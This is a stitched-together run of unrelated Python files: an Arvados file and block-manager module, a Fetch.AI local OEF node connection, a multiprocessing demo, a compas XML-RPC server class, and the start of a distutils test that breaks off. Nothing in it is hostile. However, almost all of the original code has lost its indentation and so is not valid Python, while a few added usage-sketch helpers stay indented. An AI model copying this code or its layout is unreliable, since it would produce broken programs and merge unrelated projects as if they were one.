def get_block_contents(self, locator, num_retries, cache_only=False):
"""Fetch a block.
First checks to see if the locator is a BufferBlock and return that, if
not, passes the request through to KeepClient.get().
"""
with self.lock:
if locator in self._bufferblocks:
bufferblock = self._bufferblocks[locator]
if bufferblock.state() != _BufferBlock.COMMITTED:
return bufferblock.buffer_view[0:bufferblock.write_pointer].tobytes()
else:
locator = bufferblock._locator
if cache_only:
return self._keep.get_from_cache(locator)
else:
return self._keep.get(locator, num_retries=num_retries)
def commit_all(self):
"""Commit all outstanding buffer blocks.
This is a synchronous call, and will not return until all buffer blocks
are uploaded. Raises KeepWriteError() if any blocks failed to upload.
"""
self.repack_small_blocks(force=True, sync=True)
with self.lock:
items = listitems(self._bufferblocks)
for k,v in items:
if v.state() != _BufferBlock.COMMITTED and v.owner:
# Ignore blocks with a list of owners, as if they're not in COMMITTED
# state, they're already being committed asynchronously.
if isinstance(v.owner, ArvadosFile):
v.owner.flush(sync=False)
with self.lock:
if self._put_queue is not None:
self._put_queue.join()
err = []
for k,v in items:
if v.state() == _BufferBlock.ERROR:
err.append((v.locator(), v.error))
if err:
raise KeepWriteError("Error writing some blocks", err, label="block")
for k,v in items:
# flush again with sync=True to remove committed bufferblocks from
# the segments.
if v.owner:
if isinstance(v.owner, ArvadosFile):
v.owner.flush(sync=True)
elif isinstance(v.owner, list) and len(v.owner) > 0:
# This bufferblock is referenced by many files as a result
# of repacking small blocks, so don't delete it when flushing
# its owners, just do it after flushing them all.
for owner in v.owner:
owner.flush(sync=True)
self.delete_bufferblock(k)
def block_prefetch(self, locator):
"""Initiate a background download of a block.
This assumes that the underlying KeepClient implements a block cache,
so repeated requests for the same block will not result in repeated
downloads (unless the block is evicted from the cache.) This method
does not block.
"""
if not self.prefetch_enabled:
return
if self._keep.get_from_cache(locator) is not None:
return
with self.lock:
if locator in self._bufferblocks:
return
self.start_get_threads()
self._prefetch_queue.put(locator)
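# A minimal usage sketch for _BlockManager, assuming a KeepClient-compatible
# `keep` object and an ArvadosFile-like `owner`; it is illustrative only and
# is never called from this module.
def _example_blockmanager_flow(keep, owner):
    with _BlockManager(keep) as bm:
        # Allocate a writable buffer block, append some data, then hand the
        # block to the background uploader threads.
        bb = bm.alloc_bufferblock(owner=owner)
        bb.append(b"hello keep")
        bm.commit_bufferblock(bb, sync=False)
        # Block until every outstanding buffer block has been written to Keep.
        bm.commit_all()
        return bb.locator()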
class ArvadosFile(object):
"""Represent a file in a Collection.
ArvadosFile manages the underlying representation of a file in Keep as a
sequence of segments spanning a set of blocks, and implements random
read/write access.
This object may be accessed from multiple threads.
"""
__slots__ = ('parent', 'name', '_writers', '_committed',
'_segments', 'lock', '_current_bblock', 'fuse_entry')
def __init__(self, parent, name, stream=[], segments=[]):
"""
ArvadosFile constructor.
:stream:
a list of Range objects representing a block stream
:segments:
a list of Range objects representing segments
"""
self.parent = parent
self.name = name
self._writers = set()
self._committed = False
self._segments = []
self.lock = parent.root_collection().lock
for s in segments:
self._add_segment(stream, s.locator, s.range_size)
self._current_bblock = None
def writable(self):
return self.parent.writable()
@synchronized
def permission_expired(self, as_of_dt=None):
"""Returns True if any of the segment's locators is expired"""
for r in self._segments:
if KeepLocator(r.locator).permission_expired(as_of_dt):
return True
return False
@synchronized
def has_remote_blocks(self):
"""Returns True if any of the segment's locators has a +R signature"""
for s in self._segments:
if '+R' in s.locator:
return True
return False
@synchronized
def _copy_remote_blocks(self, remote_blocks={}):
"""Ask Keep to copy remote blocks and point to their local copies.
This is called from the parent Collection.
:remote_blocks:
Shared cache of remote to local block mappings. This is used to avoid
doing extra work when blocks are shared by more than one file in
different subdirectories.
"""
for s in self._segments:
if '+R' in s.locator:
try:
loc = remote_blocks[s.locator]
except KeyError:
loc = self.parent._my_keep().refresh_signature(s.locator)
remote_blocks[s.locator] = loc
s.locator = loc
self.parent.set_committed(False)
return remote_blocks
@synchronized
def segments(self):
return copy.copy(self._segments)
@synchronized
def clone(self, new_parent, new_name):
"""Make a copy of this file."""
cp = ArvadosFile(new_parent, new_name)
cp.replace_contents(self)
return cp
@must_be_writable
@synchronized
def replace_contents(self, other):
"""Replace segments of this file with segments from another `ArvadosFile` object."""
map_loc = {}
self._segments = []
for other_segment in other.segments():
new_loc = other_segment.locator
if other.parent._my_block_manager().is_bufferblock(other_segment.locator):
if other_segment.locator not in map_loc:
bufferblock = other.parent._my_block_manager().get_bufferblock(other_segment.locator)
if bufferblock.state() != _BufferBlock.WRITABLE:
map_loc[other_segment.locator] = bufferblock.locator()
else:
map_loc[other_segment.locator] = self.parent._my_block_manager().dup_block(bufferblock, self).blockid
new_loc = map_loc[other_segment.locator]
self._segments.append(Range(new_loc, other_segment.range_start, other_segment.range_size, other_segment.segment_offset))
self.set_committed(False)
def __eq__(self, other):
if other is self:
return True
if not isinstance(other, ArvadosFile):
return False
othersegs = other.segments()
with self.lock:
if len(self._segments) != len(othersegs):
return False
for i in range(0, len(othersegs)):
seg1 = self._segments[i]
seg2 = othersegs[i]
loc1 = seg1.locator
loc2 = seg2.locator
if self.parent._my_block_manager().is_bufferblock(loc1):
loc1 = self.parent._my_block_manager().get_bufferblock(loc1).locator()
if other.parent._my_block_manager().is_bufferblock(loc2):
loc2 = other.parent._my_block_manager().get_bufferblock(loc2).locator()
if (KeepLocator(loc1).stripped() != KeepLocator(loc2).stripped() or
seg1.range_start != seg2.range_start or
seg1.range_size != seg2.range_size or
seg1.segment_offset != seg2.segment_offset):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
@synchronized
def set_segments(self, segs):
self._segments = segs
@synchronized
def set_committed(self, value=True):
"""Set committed flag.
If value is True, set committed to be True.
If value is False, set committed to be False for this and all parents.
"""
if value == self._committed:
return
self._committed = value
if self._committed is False and self.parent is not None:
self.parent.set_committed(False)
@synchronized
def committed(self):
"""Get whether this is committed or not."""
return self._committed
@synchronized
def add_writer(self, writer):
"""Add an ArvadosFileWriter reference to the list of writers"""
if isinstance(writer, ArvadosFileWriter):
self._writers.add(writer)
@synchronized
def remove_writer(self, writer, flush):
"""
Called from ArvadosFileWriter.close(). Remove a writer reference from the list
and do some block maintenance tasks.
"""
self._writers.remove(writer)
if flush or self.size() > config.KEEP_BLOCK_SIZE // 2:
# File writer closed, not small enough for repacking
self.flush()
elif self.closed():
# All writers closed and size is adequate for repacking
self.parent._my_block_manager().repack_small_blocks(closed_file_size=self.size())
def closed(self):
"""
Get whether this is closed or not. When the writers list is empty, the file
is supposed to be closed.
"""
return len(self._writers) == 0
@must_be_writable
@synchronized
def truncate(self, size):
"""Shrink or expand the size of the file.
If `size` is less than the size of the file, the file contents after
`size` will be discarded. If `size` is greater than the current size
of the file, it will be filled with zero bytes.
"""
if size < self.size():
new_segs = []
for r in self._segments:
range_end = r.range_start+r.range_size
if r.range_start >= size:
# segment is past the truncate size, all done
break
elif size < range_end:
nr = Range(r.locator, r.range_start, size - r.range_start, 0)
nr.segment_offset = r.segment_offset
new_segs.append(nr)
break
else:
new_segs.append(r)
self._segments = new_segs
self.set_committed(False)
elif size > self.size():
padding = self.parent._my_block_manager().get_padding_block()
diff = size - self.size()
while diff > config.KEEP_BLOCK_SIZE:
self._segments.append(Range(padding.blockid, self.size(), config.KEEP_BLOCK_SIZE, 0))
diff -= config.KEEP_BLOCK_SIZE
if diff > 0:
self._segments.append(Range(padding.blockid, self.size(), diff, 0))
self.set_committed(False)
else:
# size == self.size()
pass
def readfrom(self, offset, size, num_retries, exact=False):
"""Read up to `size` bytes from the file starting at `offset`.
:exact:
If False (default), return less data than requested if the read
crosses a block boundary and the next block isn't cached. If True,
only return less data than requested when hitting EOF.
"""
with self.lock:
if size == 0 or offset >= self.size():
return b''
readsegs = locators_and_ranges(self._segments, offset, size)
prefetch = locators_and_ranges(self._segments, offset + size, config.KEEP_BLOCK_SIZE, limit=32)
locs = set()
data = []
for lr in readsegs:
block = self.parent._my_block_manager().get_block_contents(lr.locator, num_retries=num_retries, cache_only=(bool(data) and not exact))
if block:
blockview = memoryview(block)
data.append(blockview[lr.segment_offset:lr.segment_offset+lr.segment_size].tobytes())
locs.add(lr.locator)
else:
break
for lr in prefetch:
if lr.locator not in locs:
self.parent._my_block_manager().block_prefetch(lr.locator)
locs.add(lr.locator)
return b''.join(data)
@must_be_writable
@synchronized
def writeto(self, offset, data, num_retries):
"""Write `data` to the file starting at `offset`.
This will update existing bytes and/or extend the size of the file as
necessary.
"""
if not isinstance(data, bytes) and not isinstance(data, memoryview):
data = data.encode()
if len(data) == 0:
return
if offset > self.size():
self.truncate(offset)
if len(data) > config.KEEP_BLOCK_SIZE:
# Chunk it up into smaller writes
n = 0
dataview = memoryview(data)
while n < len(data):
self.writeto(offset+n, dataview[n:n + config.KEEP_BLOCK_SIZE].tobytes(), num_retries)
n += config.KEEP_BLOCK_SIZE
return
self.set_committed(False)
if self._current_bblock is None or self._current_bblock.state() != _BufferBlock.WRITABLE:
self._current_bblock = self.parent._my_block_manager().alloc_bufferblock(owner=self)
if (self._current_bblock.size() + len(data)) > config.KEEP_BLOCK_SIZE:
self._current_bblock.repack_writes()
if (self._current_bblock.size() + len(data)) > config.KEEP_BLOCK_SIZE:
self.parent._my_block_manager().commit_bufferblock(self._current_bblock, sync=False)
self._current_bblock = self.parent._my_block_manager().alloc_bufferblock(owner=self)
self._current_bblock.append(data)
replace_range(self._segments, offset, len(data), self._current_bblock.blockid, self._current_bblock.write_pointer - len(data))
self.parent.notify(WRITE, self.parent, self.name, (self, self))
return len(data)
@synchronized
def flush(self, sync=True, num_retries=0):
"""Flush the current bufferblock to Keep.
:sync:
If True, commit block synchronously, wait until buffer block has been written.
If False, commit block asynchronously, return immediately after putting block into
the keep put queue.
"""
if self.committed():
return
if self._current_bblock and self._current_bblock.state() != _BufferBlock.COMMITTED:
if self._current_bblock.state() == _BufferBlock.WRITABLE:
self._current_bblock.repack_writes()
if self._current_bblock.state() != _BufferBlock.DELETED:
self.parent._my_block_manager().commit_bufferblock(self._current_bblock, sync=sync)
if sync:
to_delete = set()
for s in self._segments:
bb = self.parent._my_block_manager().get_bufferblock(s.locator)
if bb:
if bb.state() != _BufferBlock.COMMITTED:
self.parent._my_block_manager().commit_bufferblock(bb, sync=True)
to_delete.add(s.locator)
s.locator = bb.locator()
for s in to_delete:
# Don't delete the bufferblock if it's owned by many files. It'll be
# deleted after all of its owners are flush()ed.
if self.parent._my_block_manager().get_bufferblock(s).owner is self:
self.parent._my_block_manager().delete_bufferblock(s)
self.parent.notify(MOD, self.parent, self.name, (self, self))
@must_be_writable
@synchronized
def add_segment(self, blocks, pos, size):
"""Add a segment to the end of the file.
`pos` and `size` reference a section of the stream described by
`blocks` (a list of Range objects).
"""
self._add_segment(blocks, pos, size)
def _add_segment(self, blocks, pos, size):
"""Internal implementation of add_segment."""
self.set_committed(False)
for lr in locators_and_ranges(blocks, pos, size):
last = self._segments[-1] if self._segments else Range(0, 0, 0, 0)
r = Range(lr.locator, last.range_start+last.range_size, lr.segment_size, lr.segment_offset)
self._segments.append(r)
@synchronized
def size(self):
"""Get the file size."""
if self._segments:
n = self._segments[-1]
return n.range_start + n.range_size
else:
return 0
@synchronized
def manifest_text(self, stream_name=".", portable_locators=False,
normalize=False, only_committed=False):
buf = ""
filestream = []
for segment in self._segments:
loc = segment.locator
if self.parent._my_block_manager().is_bufferblock(loc):
if only_committed:
continue
loc = self.parent._my_block_manager().get_bufferblock(loc).locator()
if portable_locators:
loc = KeepLocator(loc).stripped()
filestream.append(LocatorAndRange(loc, KeepLocator(loc).size,
segment.segment_offset, segment.range_size))
buf += ' '.join(normalize_stream(stream_name, {self.name: filestream}))
buf += "\n"
return buf
@must_be_writable
@synchronized
def _reparent(self, newparent, newname):
self.set_committed(False)
self.flush(sync=True)
self.parent.remove(self.name)
self.parent = newparent
self.name = newname
self.lock = self.parent.root_collection().lock
class ArvadosFileReader(ArvadosFileReaderBase):
"""Wraps ArvadosFile in a file-like object supporting reading only.
Be aware that this class is NOT thread safe as there is no locking around
updating file pointer.
"""
def __init__(self, arvadosfile, mode="r", num_retries=None):
super(ArvadosFileReader, self).__init__(arvadosfile.name, mode=mode, num_retries=num_retries)
self.arvadosfile = arvadosfile
def size(self):
return self.arvadosfile.size()
def stream_name(self):
return self.arvadosfile.parent.stream_name()
def readinto(self, b):
data = self.read(len(b))
b[:len(data)] = data
return len(data)
@_FileLikeObjectBase._before_close
@retry_method
def read(self, size=None, num_retries=None):
"""Read up to `size` bytes from the file and return the result.
Starts at the current file position. If `size` is None, read the
entire remainder of the file.
"""
if size is None:
data = []
rd = self.arvadosfile.readfrom(self._filepos, config.KEEP_BLOCK_SIZE, num_retries)
while rd:
data.append(rd)
self._filepos += len(rd)
rd = self.arvadosfile.readfrom(self._filepos, config.KEEP_BLOCK_SIZE, num_retries)
return b''.join(data)
else:
data = self.arvadosfile.readfrom(self._filepos, size, num_retries, exact=True)
self._filepos += len(data)
return data
@_FileLikeObjectBase._before_close
@retry_method
def readfrom(self, offset, size, num_retries=None):
"""Read up to `size` bytes from the stream, starting at the specified file offset.
This method does not change the file position.
"""
return self.arvadosfile.readfrom(offset, size, num_retries)
def flush(self):
pass
class ArvadosFileWriter(ArvadosFileReader):
"""Wraps ArvadosFile in a file-like object supporting both reading and writing.
Be aware that this class is NOT thread safe as there is no locking around
updating file pointer.
"""
def __init__(self, arvadosfile, mode, num_retries=None):
super(ArvadosFileWriter, self).__init__(arvadosfile, mode=mode, num_retries=num_retries)
self.arvadosfile.add_writer(self)
def writable(self):
return True
@_FileLikeObjectBase._before_close
@retry_method
def write(self, data, num_retries=None):
if self.mode[0] == "a":
self._filepos = self.size()
self.arvadosfile.writeto(self._filepos, data, num_retries)
self._filepos += len(data)
return len(data)
@_FileLikeObjectBase._before_close
@retry_method
def writelines(self, seq, num_retries=None):
for s in seq:
self.write(s, num_retries=num_retries)
@_FileLikeObjectBase._before_close
def truncate(self, size=None):
if size is None:
size = self._filepos
self.arvadosfile.truncate(size)
@_FileLikeObjectBase._before_close
def flush(self):
self.arvadosfile.flush()
def close(self, flush=True):
if not self.closed:
self.arvadosfile.remove_writer(self, flush)
super(ArvadosFileWriter, self).close()
class WrappableFile(object):
"""An interface to an Arvados file that's compatible with io wrappers.
"""
def __init__(self, f):
self.f = f
self.closed = False
def close(self):
self.closed = True
return self.f.close()
def flush(self):
return self.f.flush()
def read(self, *args, **kwargs):
return self.f.read(*args, **kwargs)
def readable(self):
return self.f.readable()
def readinto(self, *args, **kwargs):
return self.f.readinto(*args, **kwargs)
def seek(self, *args, **kwargs):
return self.f.seek(*args, **kwargs)
def seekable(self):
return self.f.seekable()
def tell(self):
return self.f.tell()
def writable(self):
return self.f.writable()
def write(self, *args, **kwargs):
return self.f.write(*args, **kwargs)
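# The classes above are normally reached through a Collection rather than
# instantiated directly. A minimal round-trip sketch, assuming the
# arvados.collection.Collection API (Collection(), open(), manifest_text());
# illustrative only and never called from this module.
def _example_collection_round_trip():
    import arvados.collection  # assumed to be importable alongside this module
    coll = arvados.collection.Collection()
    # Collection.open() in write mode returns an ArvadosFileWriter ...
    with coll.open("hello.txt", "wb") as writer:
        writer.write(b"hello world\n")
    # ... and in read mode an ArvadosFileReader.
    with coll.open("hello.txt", "rb") as reader:
        data = reader.read()
    return data, coll.manifest_text()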
|
connection.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Extension to the Local Node."""
import asyncio
import logging
import threading
from asyncio import AbstractEventLoop, Queue
from collections import defaultdict
from concurrent.futures import Future
from threading import Thread
from typing import Any, Dict, List, Optional, Tuple, cast
from aea.common import Address
from aea.configurations.base import PublicId
from aea.connections.base import Connection, ConnectionStates
from aea.helpers.search.models import Description
from aea.mail.base import Envelope
from aea.protocols.base import Message
from aea.protocols.dialogue.base import Dialogue as BaseDialogue
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.oef_search.dialogues import (
OefSearchDialogue as BaseOefSearchDialogue,
)
from packages.fetchai.protocols.oef_search.dialogues import (
OefSearchDialogues as BaseOefSearchDialogues,
)
from packages.fetchai.protocols.oef_search.message import OefSearchMessage
_default_logger = logging.getLogger("aea.packages.fetchai.connections.local")
TARGET = 0
MESSAGE_ID = 1
RESPONSE_TARGET = MESSAGE_ID
RESPONSE_MESSAGE_ID = MESSAGE_ID + 1
STUB_DIALOGUE_ID = 0
PUBLIC_ID = PublicId.from_str("fetchai/local:0.19.0")
OefSearchDialogue = BaseOefSearchDialogue
OEF_LOCAL_NODE_SEARCH_ADDRESS = "oef_local_node_search"
OEF_LOCAL_NODE_ADDRESS = "oef_local_node"
class OefSearchDialogues(BaseOefSearchDialogues):
"""The dialogues class keeps track of all dialogues."""
def __init__(self) -> None:
"""
Initialize dialogues.
:return: None
"""
def role_from_first_message( # pylint: disable=unused-argument
message: Message, receiver_address: Address
) -> BaseDialogue.Role:
"""Infer the role of the agent from an incoming/outgoing first message
:param message: an incoming/outgoing first message
:param receiver_address: the address of the receiving agent
:return: The role of the agent
"""
# The local connection maintains the dialogue on behalf of the node
return OefSearchDialogue.Role.OEF_NODE
BaseOefSearchDialogues.__init__(
self,
self_address=OEF_LOCAL_NODE_SEARCH_ADDRESS,
role_from_first_message=role_from_first_message,
dialogue_class=OefSearchDialogue,
)
class LocalNode:
"""A light-weight local implementation of a OEF Node."""
def __init__(
self, loop: AbstractEventLoop = None, logger: logging.Logger = _default_logger
):
"""
Initialize a local (i.e. non-networked) implementation of an OEF Node.
:param loop: the event loop. If None, a new event loop is instantiated.
"""
self._lock = threading.Lock()
self.services = defaultdict(lambda: []) # type: Dict[str, List[Description]]
self._loop = loop if loop is not None else asyncio.new_event_loop()
self._thread = Thread(target=self._run_loop, daemon=True)
self._in_queue = asyncio.Queue(loop=self._loop) # type: asyncio.Queue
self._out_queues = {} # type: Dict[str, asyncio.Queue]
self._receiving_loop_task = None # type: Optional[Future]
self.address: Optional[Address] = None
self._dialogues: Optional[OefSearchDialogues] = None
self.logger = logger
def __enter__(self) -> "LocalNode":
"""Start the local node."""
self.start()
return self
def __exit__(self, exc_type: str, exc_val: str, exc_tb: str) -> None:
"""Stop the local node."""
self.stop()
def _run_loop(self) -> None:
"""
Run the asyncio loop.
This method is supposed to be run only in the Multiplexer thread.
"""
self.logger.debug("Starting threaded asyncio loop...")
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self.logger.debug("Asyncio loop has been stopped.")
async def connect(
self, address: Address, writer: asyncio.Queue
) -> Optional[asyncio.Queue]:
"""
Connect an address to the node.
:param address: the address of the agent.
:param writer: the queue where the client is listening.
:return: an asynchronous queue, that constitutes the communication channel.
"""
if address in self._out_queues.keys():
return None
if self._in_queue is None: # pragma: nocover
raise ValueError("In queue not set.")
q = self._in_queue # type: asyncio.Queue
self._out_queues[address] = writer
self.address = address
self._dialogues = OefSearchDialogues()
return q
def start(self) -> None:
"""Start the node."""
if not self._loop.is_running() and not self._thread.is_alive():
self._thread.start()
self._receiving_loop_task = asyncio.run_coroutine_threadsafe(
self.receiving_loop(), loop=self._loop
)
self.logger.debug("Local node has been started.")
def stop(self) -> None:
"""Stop the node."""
if self._receiving_loop_task is None:
raise ValueError("Connection not started!")
asyncio.run_coroutine_threadsafe(self._in_queue.put(None), self._loop).result()
self._receiving_loop_task.result()
if self._loop.is_running():
self._loop.call_soon_threadsafe(self._loop.stop)
if self._thread.is_alive():
self._thread.join()
async def receiving_loop(self) -> None:
"""Process incoming messages."""
while True:
envelope = await self._in_queue.get()
if envelope is None:
self.logger.debug("Receiving loop terminated.")
return
self.logger.debug("Handling envelope: {}".format(envelope))
await self._handle_envelope(envelope)
async def _handle_envelope(self, envelope: Envelope) -> None:
"""Handle an envelope.
:param envelope: the envelope
:return: None
"""
if (
envelope.protocol_specification_id
== OefSearchMessage.protocol_specification_id
):
await self._handle_oef_message(envelope)
else:
OEFLocalConnection._ensure_valid_envelope_for_external_comms( # pylint: disable=protected-access
envelope
)
await self._handle_agent_message(envelope)
async def _handle_oef_message(self, envelope: Envelope) -> None:
"""Handle oef messages.
:param envelope: the envelope
:return: None
"""
if not isinstance(envelope.message, OefSearchMessage): # pragma: nocover
raise ValueError("Message not of type OefSearchMessage.")
oef_message, dialogue = self._get_message_and_dialogue(envelope)
if dialogue is None:
self.logger.warning(
"Could not create dialogue for message={}".format(oef_message)
)
return
if oef_message.performative == OefSearchMessage.Performative.REGISTER_SERVICE:
await self._register_service(
envelope.sender, oef_message.service_description
)
elif (
oef_message.performative == OefSearchMessage.Performative.UNREGISTER_SERVICE
):
await self._unregister_service(oef_message, dialogue)
elif oef_message.performative == OefSearchMessage.Performative.SEARCH_SERVICES:
await self._search_services(oef_message, dialogue)
else:
# request not recognized
pass
async def _handle_agent_message(self, envelope: Envelope) -> None:
"""
Forward an envelope to the right agent.
:param envelope: the envelope
:return: None
"""
destination = envelope.to
if destination not in self._out_queues.keys():
msg = DefaultMessage(
performative=DefaultMessage.Performative.ERROR,
dialogue_reference=("", ""),
target=TARGET,
message_id=MESSAGE_ID,
error_code=DefaultMessage.ErrorCode.INVALID_DIALOGUE,
error_msg="Destination not available",
error_data={},
)
error_envelope = Envelope(
to=envelope.sender, sender=OEF_LOCAL_NODE_ADDRESS, message=msg,
)
await self._send(error_envelope)
return
await self._send(envelope)
async def _register_service(
self, address: Address, service_description: Description
) -> None:
"""
Register a service agent in the service directory of the node.
:param address: the address of the service agent to be registered.
:param service_description: the description of the service agent to be registered.
:return: None
"""
with self._lock:
self.services[address].append(service_description)
async def _unregister_service(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Unregister a service agent.
:param oef_search_msg: the incoming message.
:param dialogue: the dialogue.
:return: None
"""
service_description = oef_search_msg.service_description
address = oef_search_msg.sender
with self._lock:
if address not in self.services:
msg = dialogue.reply(
performative=OefSearchMessage.Performative.OEF_ERROR,
target_message=oef_search_msg,
oef_error_operation=OefSearchMessage.OefErrorOperation.UNREGISTER_SERVICE,
)
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
await self._send(envelope)
else:
self.services[address].remove(service_description)
if len(self.services[address]) == 0:
self.services.pop(address)
async def _search_services(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Search the agents in the local Service Directory, and send back the result.
This is actually a dummy search; it returns all the registered agents with the specified data model.
If the data model is not specified, it will return all the agents.
:param oef_search_msg: the message.
:param dialogue: the dialogue.
:return: None
"""
with self._lock:
query = oef_search_msg.query
result = [] # type: List[str]
if query.model is None:
result = list(set(self.services.keys()))
else:
for agent_address, descriptions in self.services.items():
for description in descriptions:
if description.data_model == query.model:
result.append(agent_address)
msg = dialogue.reply(
performative=OefSearchMessage.Performative.SEARCH_RESULT,
target_message=oef_search_msg,
agents=tuple(sorted(set(result))),
)
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
await self._send(envelope)
def _get_message_and_dialogue(
self, envelope: Envelope
) -> Tuple[OefSearchMessage, Optional[OefSearchDialogue]]:
"""
Get a message copy and dialogue related to this message.
:param envelope: incoming envelope
:return: Tuple[Message, Optional[Dialogue]]
"""
if self._dialogues is None: # pragma: nocover
raise ValueError("Call connect before!")
message = cast(OefSearchMessage, envelope.message)
dialogue = cast(Optional[OefSearchDialogue], self._dialogues.update(message))
return message, dialogue
async def _send(self, envelope: Envelope) -> None:
"""Send a message."""
destination = envelope.to
destination_queue = self._out_queues[destination]
destination_queue._loop.call_soon_threadsafe(destination_queue.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
self.logger.debug("Send envelope {}".format(envelope))
async def disconnect(self, address: Address) -> None:
"""
Disconnect.
:param address: the address of the agent
:return: None
"""
with self._lock:
self._out_queues.pop(address, None)
self.services.pop(address, None)
class OEFLocalConnection(Connection):
"""
Proxy to the functionality of the OEF.
It allows the interaction between agents, but not the search functionality.
It is useful for local testing.
"""
connection_id = PUBLIC_ID
def __init__(self, local_node: Optional[LocalNode] = None, **kwargs: Any) -> None:
"""
Load the connection configuration.
Initialize a OEF proxy for a local OEF Node
:param local_node: the Local OEF Node object. This reference must be the same across the agents of interest. (Note, AEA loader will not accept this argument.)
"""
super().__init__(**kwargs)
self._local_node = local_node
self._reader = None # type: Optional[Queue]
self._writer = None # type: Optional[Queue]
async def connect(self) -> None:
"""Connect to the local OEF Node."""
if self._local_node is None: # pragma: nocover
raise ValueError("No local node set!")
if self.is_connected: # pragma: nocover
return
with self._connect_context():
self._reader = Queue()
self._writer = await self._local_node.connect(self.address, self._reader)
async def disconnect(self) -> None:
"""Disconnect from the local OEF Node."""
if self._local_node is None:
raise ValueError("No local node set!") # pragma: nocover
if self.is_disconnected:
return # pragma: nocover
self.state = ConnectionStates.disconnecting
if self._reader is None:
raise ValueError("No reader set!") # pragma: nocover
await self._local_node.disconnect(self.address)
await self._reader.put(None)
self._reader, self._writer = None, None
self.state = ConnectionStates.disconnected
async def send(self, envelope: Envelope) -> None:
"""Send a message."""
self._ensure_connected()
self._writer._loop.call_soon_threadsafe(self._writer.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
async def receive(self, *args: Any, **kwargs: Any) -> Optional["Envelope"]:
"""
Receive an envelope. Blocking.
:return: the envelope received, or None.
"""
self._ensure_connected()
try:
if self._reader is None:
raise ValueError("No reader set!") # pragma: nocover
envelope = await self._reader.get()
if envelope is None: # pragma: no cover
self.logger.debug("Receiving task terminated.")
return None
self.logger.debug("Received envelope {}".format(envelope))
return envelope
except Exception: # pragma: nocover # pylint: disable=broad-except
return None
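# A minimal wiring sketch for LocalNode and OEFLocalConnection, assuming the
# usual aea Connection constructor keyword arguments (configuration, identity,
# data_dir, ...) are supplied by the caller in `connection_kwargs`;
# illustrative only and never called from this module.
def _example_local_node_wiring(connection_kwargs: Dict[str, Any]) -> OEFLocalConnection:
    node = LocalNode()
    node.start()
    # Every agent that should reach the others through this connection must
    # share the same LocalNode instance.
    return OEFLocalConnection(local_node=node, **connection_kwargs)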
|
example2.py
|
# importing the multiprocessing module
import multiprocessing
import time
import os
def worker1():
# printing process id
time.sleep(5)
print("ID of process running worker1: {}".format(os.getpid()))
def worker2():
# printing process id
print("ID of process running worker2: {}".format(os.getpid()))
if __name__ == "__main__":
# printing main program process id
print("ID of main process: {}".format(os.getpid()))
# creating processes
p1 = multiprocessing.Process(target=worker1)
p2 = multiprocessing.Process(target=worker2)
# starting processes
p1.start()
p2.start()
# check if processes are alive
print("Process p1 is alive: {}".format(p1.is_alive()))
print("Process p2 is alive: {}".format(p2.is_alive()))
# process IDs
print("ID of process p1: {}".format(p1.pid))
print("ID of process p2: {}".format(p2.pid))
# wait until processes are finished
p1.join()
p2.join()
# both processes finished
print("Both processes finished execution!")
# check if processes are alive
print("Process p1 is alive: {}".format(p1.is_alive()))
print("Process p2 is alive: {}".format(p2.is_alive()))
|
server.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import threading
try:
from SimpleXMLRPCServer import SimpleXMLRPCServer
except ImportError:
from xmlrpc.server import SimpleXMLRPCServer
__all__ = ['Server']
class Server(SimpleXMLRPCServer):
"""Version of a `SimpleXMLRPCServer` that can be cleanly terminated from the client side.
Examples
--------
.. code-block:: python
# service.py
from compas.rpc import Server
from compas.rpc import Dispatcher
class DefaultService(Dispatcher):
pass
if __name__ == '__main__':
server = Server(("localhost", 8888))
server.register_function(server.ping)
server.register_function(server.remote_shutdown)
server.register_instance(DefaultService())
server.serve_forever()
Notes
-----
This class has to be used by a service to start the XMLRPC server in a way
that can be pinged to check if the server is live, and can be cleanly terminated.
"""
def ping(self):
"""Simple function used to check if a remote server can be reached.
Notes
-----
Should be used together with an instance of `compas.rpc.Server`.
"""
return 1
def remote_shutdown(self):
threading.Thread(target=self._shutdown_thread).start()
return 1
def _shutdown_thread(self):
self.shutdown()
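# A minimal client-side sketch showing how the ping/remote_shutdown functions
# registered in the docstring example can be called over plain XML-RPC; the
# host and port here are assumptions matching that example, and this helper
# is illustrative only.
def _example_client_shutdown(host="localhost", port=8888):
    try:
        from xmlrpc.client import ServerProxy
    except ImportError:  # Python 2 fallback, mirroring the server-side import above
        from xmlrpclib import ServerProxy
    proxy = ServerProxy("http://%s:%s" % (host, port))
    assert proxy.ping() == 1        # the service is reachable
    return proxy.remote_shutdown()  # ask the service to terminate cleanly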
|
test_msvccompiler.py
|
"""Tests for distutils._msvccompiler."""
import sys
import unittest
import unittest.mock
import os
import threading
from distutils.errors import DistutilsPlatformError
from distutils.tests import support
from test.support import run_unittest
SKIP_MESSAGE = (None if sys.platform == "win32" else
"These tests are only for win32")
@unittest.skipUnless(SKIP_MESSAGE is None, SKIP_MESSAGE)
class msvccompilerTestCase(support.TempdirManager,
unittest.TestCase):
def test_no_compiler(self):
import distutils._msvccompiler as _msvccompiler
# makes sure query_vcvarsall raises
# a DistutilsPlatformError if the compiler
# is not found
def _find_vcvarsall(plat_spec):
return None, None
old_find_vcvarsall = _msvccompiler._find_vcvarsall
_msvccompiler._find_vcvarsall = _find_vcvarsall
try:
self.assertRaises(DistutilsPlatformError,
_msvccompiler._get_vc_env,
'wont find this version')
finally:
_msvccompiler._find_vcvarsall = old_find_vcvarsall
def test_get_vc_env_unicode(self):
import distutils._msvccompiler as _msvccompiler
